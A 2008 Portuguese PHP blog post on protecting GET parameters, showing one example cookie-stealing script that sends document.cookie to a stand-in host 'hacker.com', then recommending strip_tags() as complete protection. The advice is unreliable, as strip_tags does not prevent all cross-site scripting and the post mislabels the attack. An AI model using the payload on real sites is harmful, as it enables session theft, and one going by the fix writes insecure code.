Portal webmaster

PHP Injection, como prever?

Novo aqui no site? Talvez gostaria de assinar o
RSS feed do site?

Publicado em: 06/11/2008
Área: PHP
Visualizações: 819
Comentário(s): 2

Muitos usam defensores contra MySQL Injection, mas não sabem que o PHP Injection pode ser um ameaçador eminente. Quando você recebe parâmetros pelo GET, ou seja, via endereço do seu browser, como por exemplo:

http://www.seusite.com/pagina.php?id=20

Até aí tudo bem, você sabe que vai receber um valor inteiro, para ser usado com o array $_GET. Mas imagine se ao invés de 20 passe isto:

<script>window.location.href = 'http://hacker.com/cookie-stealer.php?c=' + document.cookie;</script>

Será completamente visível os cookies de que sua página gerou. Se você usa cookies como forma de guardar informações de login, tenha cuidado, pois há como obter estas informações com javascript.

Proteja seu php:

Para sua proteção, use a função strip_tags() do PHP para remover qualquer tag, seja ela javascript, HTML ou PHP.

Use seu GET da seguinte forma:
$id = strip_tags($_GET[ 'id' ]);

Assim você receberá apenas texto sem qualquer tag, e estará seguro de que não será direcionado a qualquer lugar ou terá informações roubadas através do GET.

Dicas, dúvidas, comentem abaixo.

• Formulário flash + php
• Formulário de envio de Email - Dreamweaver + PHP
• Montando Álbum de fotos em php
• Colocando um formulário de contato em seu site, usando o mail() do php
• Formulário de Email em PHP com resposta automática
• Validando formulário de E-mail com PHP
• Sistema De Login Usando Sessions E Mysql
• Programas que monitoram sites e o computador.

Clique aqui para comentar comentários

Preencha o formulário para comentar:

Lino

- Publicado em: 06/11/2008 - 13:35

Não conhecia essa funcionalidade do PHP! Legal que a aplicação é bem fácil e a função se encarrega de tudo obrigado pela dica!

Nicolas

- Publicado em: 06/11/2008 - 13:39

É Lino, toda segurança não é o bastante.

Autor da matéria

» site do autor

Nícolas Müller
Sou um profissional da área de internet, trabalho como programador, designer e desenvolvedor de sites, faz cerca de 8 anos que estou atuando na área , sendo 5 .

Todas as matérias de Nícolas Müller

Seguir o Oficina da Net

Top matérias do mês

1992 - O ano em que Bill Gates previu o futuro dos computadores
O computador terá o tamanho que você quiser. Poderá ser do tamanho da .
Photoshop: Aplicando tatuagem em uma pessoa
Aqui veremos como aplicar uma tatuagem a qualquer pessoa de uma maneir.
Dicas para tornar seu site conhecido
Público é um item fundamental para se ter um site. De que adianta você.
Imagens em quebra cabeça
Veja como transformar suas imagens em quebra cabeças de uma maneira be.
Vídeo Aula Sony vegas - Criando efeito de filme antigo
Olá pessoal, estou aqui para mais uma vídeo aula, desta vez vou mostra.

Matérias relacionadas

Vídeo aula: Compactar e descompactar arquivos com PHP
Neste tutorial vou mostrar como criar arquivos em formato zip, e como .
O que é o PHP-GTK?
O GTK é um conjunto de bibliotecas, desenvolvido originalmente por Pet.
Fedd RSS com atualização automática (XML + PHP + MySQL)
Queridos leitores, hoje vou mostrar para vocês como montar um Feed RSS.
Chamando arquivo PHP por Java Script
Esta forma você pode ainda passar parâmetros a serem utilizados dentro.
Paginator: Paginação de resultados com PHP + MySQL + CSS
Paginação de resultados hoje é um processo indispensável no desenvolvi.

Destaque

ÍCONESBR
Confira uma das maiores coletâneas grátis de ícones da internet. No íconesbr é fácil de encontrar o que você procura.